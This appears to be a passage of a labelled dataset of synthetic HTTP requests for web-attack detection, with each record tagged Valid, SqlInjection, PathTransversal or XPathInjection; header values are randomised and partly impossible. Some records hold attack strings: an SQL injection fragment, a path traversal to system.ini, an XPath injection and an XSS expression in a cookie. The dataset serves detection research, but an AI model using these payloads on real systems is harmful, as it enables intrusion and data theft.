Accept: text/plain
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cookie: smlxada=lzs "      style=left:expression(alert ("5es8.ieYi  "))    alt = "
Date: Sat, 13 Feb 10 17:29:53 UTC
Expect: 100-continue
If-Modified-Since: Tue, 16 Sep 08 14:00:38 CET
If-Range: Sat, 09 Sep 06 03:49:57 UTC
Referer: http://Oi1yh.ch/aahbrat/mtUg/deysm/ewpR/dTohtP.cgi
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 1.6; eN-5e; rv:9.7.4) Gecko/89572395
Transfer-Encoding: identity
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

UDTqK=rveokrh9'g

End - Id: 48291
Start - Id: 32227
class: Valid
GET /o3oo/eeZBp0x2ir0/tniizw9lsgsgaazeOeou/0XYWGhGsJSwHztOw/icuyhn3e/6azahacvdheinmtsjAse/ystrMahoanuoi/Irsr/agedsjfi46qlneraaeb/us5k/ros0rlaffEsnxts127/3Hw5AcawghMnFdM3atyC.mdb? HTTP/1.1
Host: 81.47.136.2:5
Connection: ademNi
Accept: */*
Accept-Charset: euc-cn, utf-8
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: min-fresh=8676
Client-ip: 20.168.138.91
Cookie: jaSyOc=jpassthru so;t vuac?tlkck;fd=2496856317
Cookie2: $Version="16"
Date: Sun, 23 Jul 06 08:19:31 GMT
ETag: W/"zUX0Frs2tyZi97G.SMh."
Expect: 100-continue
From: e26srb@io4s2eeaid.gov
If-Modified-Since: Wed, 31 Mar 04 08:15:52 CET
If-Unmodified-Since: Sun, 06 Dec 09 04:42:18 GMT
If-Match: *
If-None-Match: "vweAjYsPMLUMOovuzJ"
If-Range: Sat, 24 Jul 04 10:18:46 GMT
Max-Forwards: 812
MIME-Version: 2.5
Pragma: nrg=hrx
Proxy-Authorization: Digest username="udr5p1ia"
Authorization: erd1ar tclnqj=soear2g
Range: -31011,02795-
Referer: http://www.ais7a.uk/wfeane/s8wt/telspa.fgf
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: ehaecuetge/6.5.3.5
UA-CPU: 68000
UA-Disp: 749,3420,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9968x063
Via: 9.4 www.hisaiio.js, 5.2 83.54.187.89
Transfer-Encoding: deflate
Upgrade: lzs/3.7, tsNj/4.2, sdsRft/3.0
Warning: 498 120.1.39.164 "tiusLw" 
X-Forwarded-For: 204.13.171.9
X-Serial-Number: 76488
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 32227
Start - Id: 7853
class: Valid
PUT /@LH5o6/tmehdihiudg/westeo/szW91F8/n7itbmn/u9eL4A28.pl? HTTP/1.0
Content-Length: 123
Content-Language: lcyVtt,es
Content-Encoding: compress
Content-Location: http://CentOoe.be/izFiv5.png
Content-MD5: ZHR5aWhlYWllcmxhbmlyNA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Apr 09 07:01:43 UTC
Last-Modified: Mon, 19 Nov 07 14:53:15 UTC
Host: www.et4kuhgMsF.org
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 84.201.37.41
Cookie: HtezCezae=4779;oppnst=nhe;iyAenhn=9369;e35dsn4A8ol4=132542;tae=svbinnsjumshdo;stitEued=87
Cookie2: $Version="69"
Date: Thu, 05 Mar 09 10:44:39 UTC
ETag: "XZ-N4lID.peR7jC0Yvvu"
Expect: 100-continue
From: rnda3N@eUsEnd.cz
If-Modified-Since: Thu, 13 May 04 05:25:34 GMT
If-Unmodified-Since: Wed, 01 Dec 04 17:28:01 GMT
If-Match: "G_e.vBSxVBJOGN06RFNp"
If-None-Match: "yhA8NaXvPmLMSk@K"
If-Range: "ZTg8mhdo9i81SCWFg4Q3"
Max-Forwards: 79
MIME-Version: 3.7
Pragma: aentee=t
Proxy-Authorization: NTLM T3BpNHNobmVlYnNEdzhyaVRpOWp1cnVvdHRlVWp0QXduMGkyZVM=
Authorization: Basic aG96dWx0OnJvRXFybnI=
Range: 3-90,72191-
Referer: http://www.qsismo.uk/ge4ii.mspx
TE: deflate
Trailer: Connection
User-Agent: kqrm5/1.8.4.0.0
UA-CPU: MIPS
UA-Disp: 6357,331,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 669x1617
Via: 0.3 43.225.204.54:8997
Transfer-Encoding: deflate
Upgrade: geop/6.3, gadsi/7.1, Risfc/1.7, ieeeh8/4.3, ht1/2.2
Warning: 393 www.e0nt7dn.jpeg "mel9ehnAlnr" "Sun, 07 Sep 08 05:30:02 UTC"
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 625088294062
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

menseIfgoig3ins=ebinse&essube=ahouunes3eflnawon&7go=sm&4.FDghtpassr=hbAV2mH8&TonjNvtatcag=39&Rwmcxrow=nBhkFIIfYY&w5w3Tj7k=3

End - Id: 7853
Start - Id: 35191
class: SqlInjection
GET /ecefflfsmdroIbtU/9k/t2n.jpeg?gtroenoe=0E&dz=gTUa5LAav&oid7o=yukTCbMc9y&CdocumentmI=ittf9elr&aH=9495669&_SKgsP0Ydocument=7&xsdtg3ee=OR++++%27olev%27++IN+++++%28%27%27++++%29&1nootj=1z17U0jw8Zb&edcs=r+s&tNorozpi=i%26toall&o1eTc9qaTteoe7=nEllrorNnZjk&bzJXfnWpasswd9bin0=eaaccess_log&bow=rpadCA HTTP/1.1
Host: 252.43.122.171
Connection: hxn6E
Accept: application/rtf;q=0.6, audio/*
Accept-Charset: x-mac-ce;q=0.2, x-mac-arabic
Accept-Encoding: *;q=0.2
Accept-Language: rde-mpm6ycmr, sei-aiGiw;q=0.1, xc8-eb;q=0.8
Cache-Control: ne='tor'
Client-ip: 12.218.241.252
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Tue, 08 Aug 06 15:39:57 UTC
ETag: "Q7ymttM9lu3GrvwrJmu."
Expect: twhn
From: ei5rasmn@Is8otu4t.com
If-Modified-Since: Wed, 23 Sep 09 24:31:30 UTC
If-Unmodified-Since: Mon, 26 Feb 07 16:35:55 CET
If-Match: *
If-None-Match: *
If-Range: "-QivBbKHnsx49tPY"
Max-Forwards: 183
MIME-Version: 2.3
Pragma: uaiBtg=tahecbi
Proxy-Authorization: 9trc 8rehoi=lhgsh5
Authorization: Basic YmNkenJlbnQ6M3JlbHRkamE=
Range: 7416-9436,-80
Referer: http://www.xagsyhr5.org/jtmrsQhu/reInvh.mspx
TE: trailers,deflate
Trailer: Referer
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 4.5; sn-wb; rv:6.3.2) Gecko/98922903
UA-CPU: StrongARM
UA-Disp: 1981,291,8
UA-Color: color32
UA-Pixels: 0990x1742
Via: OiraAi/7.4 108.17.167.77, 3.4 www.nSbvldn.js
Transfer-Encoding: identity
Upgrade: Iivqh/4.1, nEStsn/0.1, ocna/1.5, bea/5.8, n7i/2.7
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 33888894835
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35191
Start - Id: 32608
class: Valid
POST /e0dexs5rh/nNIxservicesMMall/o5ytn/_Kb6.MAC/fdvesSiekzEnyssm6/whaoar.mspx? HTTP/1.1
Content-Length: 133
Content-Language: ito,8o2adda,8
Content-Encoding: deflate
Content-Location: /aRlVon/hw8ODksq/Eiopr/s3azyet5/e9yN7.bin
Content-MD5: cnR0SG92YnZCdXhobnNwdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Oct 05 09:22:53 UTC
Last-Modified: Thu, 20 May 04 18:01:34 GMT
Host: www.notacuz.org:6
Connection: keep-alive
Accept: video/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.1
Cache-Control: ctq=5nlc
Client-ip: 40.170.188.151
Cookie: opdtsaneinimvS=365620;lAQbye=jK8HFgxoV5;dkTfmiheO=70;tlnsurw=wmre
Cookie2: $Version="52"
Date: Wed, 23 Dec 09 10:56:25 CET
ETag: W/"cw4BFNhsGmXr_fqW"
Expect: 100-continue
From: mhhvcrm@gtad.de
If-Modified-Since: Thu, 04 Jun 09 02:51:10 CET
If-Unmodified-Since: Sun, 13 Mar 05 06:26:36 GMT
If-Match: "vmxxUm8eOKVqJ3w"
If-None-Match: "5CBrglyCidtU98q4Lb"
If-Range: Mon, 18 Jul 05 02:07:26 GMT
Max-Forwards: 7
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: adtt9 cssas=aamp
Authorization: Digest response="7c1d718A56F83d31AD77eDea9fd0FC8E"
Range: -619576,782-7
Referer: /nDnpge.png
TE: chunked;q=0.9
Trailer: Referer
User-Agent: ungssrt (e3Q_JMc)
UA-CPU: 68000
UA-Disp: 776,700,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2740x572
Via: 3.3 162.249.245.179
Transfer-Encoding: deflate
Upgrade: 0ss/3.7, rol/6.4, t7a/3.1, oeOo/5.0, iui/8.8
Warning: 600 www.oeyQ.gif:6 "MqLrrRse4tmzoe" 
X-Forwarded-For: 64.19.200.199
X-Serial-Number: 73155166220455300
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

ce=91&loqeltnsrsarc=sn&chttpapMH1Ha2I=tsoeEerabuayuile4&S8inysCi0r=a&aa9Fag9pr=ner2e d)km  xer&binudocumentkYtR=scriptsorme&%l0

End - Id: 32608
Start - Id: 45086
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: 116.109.149.113
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.3, identity, gzip;q=0.1, gzip, gzip
Accept-Language: *
Cache-Control: min-fresh=19350
Client-ip: 214.121.21.204
Cookie: evl4bir=42314;Ef0rj=oe7arWFhr7tse8;tckllelebd=455904
Cookie2: $Version="865"
Date: Mon, 22 Oct 07 17:00:14 GMT
ETag: W/"ripDnExYI_q8e4R"
Expect: 100-continue
From: uoSnnen@oz8Aa.ch
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Mon, 20 Mar 06 13:02:50 GMT
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: *
If-Range: "dE-XGHqUO90YpYkq"
Max-Forwards: 80
MIME-Version: 2.7
Pragma: ly4z='pj'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: Basic dHRsZGVuZGk6amZsaw==
Range: 61-,599945-,96-
Referer: http://www.lohexml.gov/f9asrte/ooietlL/0tfnnrt.swf
TE: trailers,chunked
Trailer: Connection
User-Agent: Mozilla/0.7 (Windows; U; Win98 1.6; Nj-ee; rv:2.7.2) Gecko/23344457
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1990x238
Via: 4.8 164.90.14.136, FTP/2.8 177.4.201.202, 1.3 www.ned2hwul.jpg
Transfer-Encoding: identity
Upgrade: ttpNf/8.4
Warning: 437 www.epd64fo.jpeg "eNe3tlcu" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 324503957971792
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45086
Start - Id: 5587
class: Valid
POST /twLmRbsy/eiijtaya5/1QIzJkY.Vy1N5VqTC3db/a9WgN8/aeha/3RaPN1Q7/p5bY6K4U1OL0hxm4b.jpeg? HTTP/1.1
Content-Length: 314
Content-Language: nuvosluc,1tli
Content-Encoding: gzip
Content-Location: http://www.awbXhE.org/0dnrnIn/hHloi/he0hE/oqcb4c/daaT.txt
Content-MD5: aG9lc0V3bmJtY3ZlYTVodw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Oct 07 16:35:36 GMT
Last-Modified: Tue, 01 Aug 06 10:09:16 GMT
Host: www.hIexwtcW.st
Connection: 4i7rml
Accept: */*;q=0.1
Accept-Charset: iso-8859-8-i, x-mac-chinesetrad;q=0.3, big5;q=0.3, windows-874;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=13
Client-ip: 120.107.44.213
Cookie: aytont4uyruaep=Msqvotpet9
Cookie2: $Version="811"
Date: Sun, 18 Apr 10 24:26:18 CET
ETag: W/"yf8v3S-hPt7MNYXsQGs2"
Expect: 100-continue
From: lsbetkih@rdl7oi5.fr
If-Modified-Since: Mon, 16 Jun 08 15:04:36 UTC
If-Unmodified-Since: Sat, 01 May 10 16:42:08 GMT
If-Match: "dy4WN5GX4LUs@9DUtDSL"
If-None-Match: *
If-Range: *
Max-Forwards: 4716
MIME-Version: 6.2
Pragma: naaw8oR=timye
Proxy-Authorization: c9oqp 5lei=rnNhes
Authorization: NTLM c25zZzRsdEh5dHNzR25lcWljbGVydGRiZXd6Zm5uYXZtdG9BSnRyZnQ=
Range: 673-
Referer: /obvp0rf/aybON/gtrep/57eres/CcIv.tar
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/4.9 (X11; U; Open BSD i586 6.3; rl-ae; rv:9.4.4) Gecko/73326426
UA-CPU: x86
UA-Disp: 972,439,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0202x3743
Via: FTP/3.6 214.126.111.44
Transfer-Encoding: compress
Upgrade: 0gdai/9.0, eup9/9.9, osahep/0.7, ihgie/4.7
Warning: 189 www.tsXitt6.gif "8U5tatshea" 
X-Forwarded-For: 180.152.86.133
X-Serial-Number: 07654558799930280172
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bGpasswd@MrqRey=ggmMeKeqecrbN0em&shh5o=2838331494&leMdnipynhdath=h.s&dy5w4oorio=280&s3ttxalHc9b7f=9ty4&em=3440545&eTeoIt=libexec5=q8seheelstr&se1pE1hiG=tprocessing-instructiontr6ehln\nfdhm&tteb=74127617&nlSYts=g1GBrIBcJY3&attnl=834561631&oiet=)roto<et a1cA&P3etbihiMm=gn7s8ia&akn=et0ozdtswlaTert&sl38e=zNJP

End - Id: 5587
Start - Id: 22013
class: Valid
GET /WCfYIr0QFWVLX/t17Ac/4poElosrhj4tnCEWiiv/d6_b2Q0bCSWbAAEy/amLo3ule/kbHke/nps/ssrevdtupwkt/evalYwp-m@@z2zV/ytyo/6s8/7oDnq.tiff?xulynxFwetot=oIM4L&CtZZ65VkXpW=7&erkhsdhly=0612211&EfslraGTiis=As&annssIp=ciscripts%2B8n%29le+f%3EuwiX2x-&A6cr1ecs3so=wnrhacHhxp_irnet&cugee8eutuar=91237036&l1=30333230&pl=%28l%5Da0&7abe=naEsyrro1&ersldkf=186478 HTTP/1.1
Host: www.zse5sy.gov:0183
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.8, iso-8859-8-i;q=0.4, windows-1257;q=0.6, x-mac-icelandic, x-mac-chinesesimp
Accept-Encoding: gzip;q=0.4, compress, deflate;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 166.123.70.154
Cookie: OshgUbnb0n7md=o7EEcpwA53fN;InQ2.5Kf=825981;zhenyyiisS=869057;1nemoqtoh3ian=updatesotto
Cookie2: $Version="91"
Date: Sat, 15 Dec 07 12:46:08 GMT
ETag: "DOclkJFUcZnZgFdJvgB"
Expect: 100-continue
From: rnoHSnss@agsartc.de
If-Modified-Since: Sat, 21 Jun 08 03:05:48 GMT
If-Unmodified-Since: Tue, 03 May 05 04:22:27 CET
If-Match: ".WBbIOO3rSMhHiO@eK"
If-None-Match: "s4hp87YFtCLTxqMN"
If-Range: *
Max-Forwards: 7
MIME-Version: 1.6
Pragma: slehnE='rnas'
Proxy-Authorization: Basic b2ROb2V2Om9sYTc=
Authorization: NTLM ZWV2T29qaWlvdnJubGxhbTllYW5yaHRlbWF2ZWFpbGhydDRtbjNpNXNlNw==
Range: -069889,708496-
Referer: http://eZwe.ch/wki7leef/xdrf/qntc3t/othss/Dcertc.png
TE: trailers
Trailer: Expect
User-Agent: Mozilla/3.0 (X11; U; Solaris 5.6; tm-oe; rv:2.2.1) Gecko/49481046
UA-CPU: Sparc
UA-Disp: 514,290,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9844x211
Via: 0.0 56.132.50.42, inp/4.7 www.ss1t.html, HTTP/0.9 165.152.239.27
Transfer-Encoding: deflate
Upgrade: pufgp/8.1, Wcil/8.8
Warning: 409 www.rklthno.jpeg "2gidteht4e3rseoOd" 
X-Forwarded-For: 167.167.68.206
X-Serial-Number: 920022590702
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22013
Start - Id: 17824
class: Valid
GET /s9QcF4fCNeFs/ter7ao4bee6oyeee1/nKzw2hBUgbJMMdR/htftvjwiaFjeouuwh/dJO2QwlB7/CLyw-uNJvarPF.jpg?nnsdpethar=+%3Cheaeaorit HTTP/1.1
Host: www.trbr9efee.com
Connection: close
Accept: image/*;q=0.6
Accept-Charset: x-mac-cyrillic, ks_c_5601-1987, big5;q=0.0, x-mac-ce;q=0.7, iso-8859-9;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=66
Client-ip: 161.131.239.25
Cookie: cvbtimgrqtrve=62021;loVssGiu=05663822;3dfdede=a@pLXZ_-;eseojedevIm=1
Cookie2: $Version="799"
Date: Sun, 14 May 06 06:57:24 UTC
ETag: W/"oZYV-ElxESZDSBvY9P"
Expect: ugelm
From: khupg@oosaf.ch
If-Modified-Since: Tue, 21 Nov 06 16:44:54 GMT
If-Unmodified-Since: Wed, 14 Jan 04 19:39:48 GMT
If-Match: "BCvjVOGbXs2r1sNIt"
If-None-Match: *
If-Range: Fri, 13 Feb 04 15:42:09 UTC
Max-Forwards: 418
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM bW5pZXJlNlB3bGVoSW5odGk0b291bnRIdGZlaGV1VG40bQ==
Range: 4-20674
Referer: http://www.shhddtd.st/szlvpns.php4
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/1.6 (X11; U; Unix 8.2; ee-nj; rv:2.8.9) Gecko/06532028
UA-CPU: StrongARM
UA-Disp: 2638,7610,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5851x4890
Via: 9.6 126.182.27.195
Transfer-Encoding: deflate
Upgrade: Wlr/6.5, mnotTs/5.2, da54o/9.9
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 7.104.70.87
X-Serial-Number: 168409741956
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17824
Start - Id: 16573
class: Valid
GET /nmc_passthru51shutdownzE/nI-613Q2u@51mzS.sh?htsmtezaltneee=aeoewier4aincf&stI=fhttps&aSApn=938065&aiunobdnwoEn=r2tEs&eti5OTszouaee=irminetjhaaeypv&aosEig=lve&1whereb__R=tfdC2S2gO3vQ&n9hee3ftCtd52P=usadxrnaleenrn&mVDreplaceVS9ixS=d88rpot7hr75e2n6t&dpen=document%3A&-Umd5=ar0aatqjnlreOes&ISoptyopen=%3Fspc&sm=ie6itaiijavghw&bnmKn=8138&oiz7vjhSea=44265 HTTP/1.1
Host: 6.217.191.127
Connection: olati
Accept: video/mpeg, application/x-tar;q=0.7, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 154.41.32.68
Cookie: 06hEmfrste=Si)ig);LqRzKe@=e\e
Cookie2: $Version="4"
Date: Fri, 08 Aug 08 23:23:33 CET
ETag: W/"KV.tmk8mZzVaOGXf_"
Expect: nhtdstz=unLn
From: o7mnatoB@rrengt.ch
If-Modified-Since: Mon, 02 Jun 08 10:18:59 CET
If-Unmodified-Since: Mon, 08 Mar 10 19:38:04 GMT
If-Match: "gm9vkYdnUgjbKe6vB"
If-None-Match: "VzweKcIaEIps9wyat"
If-Range: *
Max-Forwards: 319
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM YWllc2F0MWFzbGUzaFJuZWN1d3FmYW1SdE9lUGNkUGVlZ29vb2lnYXd0OG5lYw==
Authorization: NTLM bzg4M2F5dEprZWEyYXM5ZWFlWm1hZWFkb2lpb2VybDFlbWxndGd2bGRjb2Vy
Range: -098113
Referer: /enmm/xfbhcs/Eldt.msf
TE: trailers,chunked
Trailer: If-Range
User-Agent: Mozilla/5.0 (compatible; Konqueror/1.0; Mac OS X; lo5wda)
UA-CPU: 68000
UA-Disp: 6863,909,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9430x4545
Via: FTP/2.1 98.136.148.132, 3.1 149.100.205.177
Transfer-Encoding: identity
Upgrade: powb/8.0, rutou/7.2, nesa7g/8.1
Warning: 295 www.istr9im.png "lznh" "Sat, 11 Apr 09 07:31:57 CET"
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16573
Start - Id: 28631
class: Valid
GET /nvfhtexVHBOLzrC.hMU/gNXxER/nbupaIhmTnecvyrtns.tiff? HTTP/1.0
Host: www.tsxt1s.de
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 158.158.21.22
Cookie: erlecymNsl=8857466;asephh=d
Cookie2: $Version="6"
Date: Sun, 24 May 09 01:47:59 GMT
ETag: "m61Hns7ULAUNoP7"
Expect: veRndioe=tfNemfiT
From: 6EaEszit@irni.st
If-Modified-Since: Mon, 16 Aug 04 21:27:57 CET
If-Unmodified-Since: Wed, 29 Jul 09 02:38:28 GMT
If-Match: *
If-None-Match: "@tpffn2ZBE73t8o"
If-Range: "jZ4bgvsWz.y0iXY"
Max-Forwards: 0610
MIME-Version: 9.0
Pragma: hz4tid=9nst
Proxy-Authorization: Basic cnRtYjppTW9naDVz
Authorization: Basic NGFoUzplZHdo
Range: 554798-,-48,6195-
Referer: http://wtkaar.be/itts/hlho/sgp0o/nsJty/k3si.php
TE: chunked;q=0.8,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.4 (Windows; U; Windows NT 2.4; gh-a1; rv:0.1.3) Gecko/07049293
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 680x3732
Via: 8.0 247.196.118.135
Transfer-Encoding: identity
Upgrade: Wtis/2.1, nat7E3/0.0, faaei/4.9, oas/2.1, fFtihs/4.5
Warning: 540 www.aacWusmD.jpeg "ehptcl" "Thu, 30 Mar 06 12:01:08 GMT"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6114886940251
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28631
Start - Id: 35659
class: XPathInjection
GET /B9O.g7LNa1M@o/sG2PY.83v/ehbgtj2hrohonE/p7MLpassthruGeinGyi/nOsLMh/e3Iu5dRn.jpeg?Tdos=bhfnhea9tainTUte&ENdaillr2iYicpc=37649++++or++1%3C+iwicS%2Fgath%2Fk%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D48%5D+++or++09549%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: 132.234.255.171
Connection: 8a3u
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 157.230.2.181
Cookie: jewerdcKyy=u8 2aqf6Jy&=s
Cookie2: $Version="90"
Date: Sat, 27 Nov 04 24:27:02 UTC
ETag: "UDJxFP191jf5i2WY"
Expect: takuent=f1qhab
From: njsh@NrDrfrcud.com
If-Modified-Since: Mon, 23 Nov 09 12:00:13 GMT
If-Unmodified-Since: Sun, 14 Oct 07 12:51:23 CET
If-Match: *
If-None-Match: "aksz6pGr7ZDHKs.y5B"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: tvqbts otO9e=Oh7KonRe
Authorization: Digest uri=http://www.eeeyeb.ch/ieiTstoe.tiff
Range: -472
Referer: /etrl8s/3fbnaAd/inayh/scut/2dseco.gif
TE: chunked;q=0.4,chunked,trailers
Trailer: User-Agent
User-Agent: rFcXjMz http://www.sae60o.biz
UA-CPU: StrongARM
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8105x4373
Via: 8.9 www.ysttes.jpeg:72, HTTP/8.6 155.185.245.126
Transfer-Encoding: rn4K
Upgrade: alcth4/9.0, omen/8.5
Warning: 673 36.123.188.80 "hcrIRotv8tetpAwee" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 24734
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35659
Start - Id: 26649
class: Valid
GET /Vc5.N/amogZ32-IV/WVUinsertm4/sZyix/9E/iv1.h/lntib6iouhi9ah/iN_/t-lrQF@iWsB4Rh/ayeafIewo7tse/ge.mdb?JJBm6Kmeta=uFste&sWejahrxe=u+h&9dLp=tvvcrn8leeeet8&in8hoeireirx=+%7Cetrxxmlgroup+by-&oopb2ss=tt&et=1508920804&eval9yGV3FdgS.=mnth&feehLrquheudt=issIsacB+aeoi+s%5D&yroI=th%2Batnntes%5Bnwiehttps%25-v&rlrnerqas4lte8N=ehp62i&nfqtoneaLreaMse=70286&setr=293&edsy=nyCe&uiiwbal=U%40it&TOR2jDUMi=%40ebi HTTP/1.1
Host: www.leeFycoT.biz
Connection: keep-alive
Accept: application/*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: min-h7rKtgal
Cache-Control: re357siw='te'
Client-ip: 147.232.3.64
Cookie: LhToi277=907481;5iframeRz=2493725;EFmochaPPaqNpc=197335;swbj=echo$ ;-onHAevalSzdinC6=88326;ygsesiphloa=cYiour
Cookie2: $Version="529"
Date: Mon, 01 Feb 10 18:11:22 UTC
ETag: "L4aJnRVFfw0cHS9"
Expect: 100-continue
From: ewdn@Isnohat.net
If-Modified-Since: Mon, 24 Mar 08 08:17:13 CET
If-Unmodified-Since: Thu, 30 Sep 04 05:43:33 UTC
If-Match: *
If-None-Match: "2beWEYbelAVhR35w"
If-Range: *
Max-Forwards: 4
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM bmVlcm44cm5zMGZlb3NrdG91d3NMbmloMGs2ZWFURXB0NGFldENpYzY=
Authorization: pste Tro1e=rjctt
Range: 0-8818,879-
Referer: http://www.fmas.com/iLonaj/xwjta/nlOo/nItat.mdb
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: aiyreeOrewfewspFoo
UA-CPU: PowerPC
UA-Disp: 080,9861,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 190x433
Via: 6.1 www.taannng.css:6870
Transfer-Encoding: gzip
Upgrade: dss/7.0, hee/2.6, eu9/8.4, uieiTe/9.3, ynTjo4/4.2
Warning: 971 www.nebeab.htm:1154 "Smtbrled4Tllis" 
X-Forwarded-For: 232.156.39.113
X-Serial-Number: 21651458708939157204
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26649
Start - Id: 29088
class: Valid
GET /en0H_89q.4.aOL/i28Mt0t45gOC/oleRrmhf/VmXFv@/gnrp2n.jsp? HTTP/1.0
Host: www.myiI.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 111.145.51.230
Cookie: MHd3Tegs6ihe9h2=9;ch9nawotrw=3670
Cookie2: $Version="72"
Date: Sun, 09 Oct 05 01:40:39 UTC
ETag: "ZRSDHtKpcZmCV4Nn"
Expect: A0doma=dnsmemo
From: a4lLen@ttAaaln.cz
If-Modified-Since: Mon, 18 Jun 07 14:22:04 GMT
If-Unmodified-Since: Thu, 26 Apr 07 01:45:41 GMT
If-Match: "bQ4dN3zt7.uq-xJbIPL"
If-None-Match: "LIaPHwjkroqC_SpWi"
If-Range: Sun, 27 Sep 09 17:55:22 UTC
Max-Forwards: 95
MIME-Version: 8.2
Pragma: vsaLan7='e'
Proxy-Authorization: Digest realm
Authorization: c8bhs NEooedm=lsdRabhr
Range: -5612
Referer: /hdtsmm/O0Lbg/Pq9tnera/6isv4ler.fgf
TE: trailers
Trailer: Accept
User-Agent: idenqent (wlXJPNER; gWaVH59; tSx_U4)
UA-CPU: x86
UA-Disp: 7928,6331,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7767x3879
Via: yltae/2.4 134.237.128.39:49
Transfer-Encoding: compress
Upgrade: teav/2.5, xneK/0.8, ecrUt/0.0, a8tr/4.9
Warning: 929 www.3dntro.js "lebaflentiiernr" 
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 29088
Start - Id: 20205
class: Valid
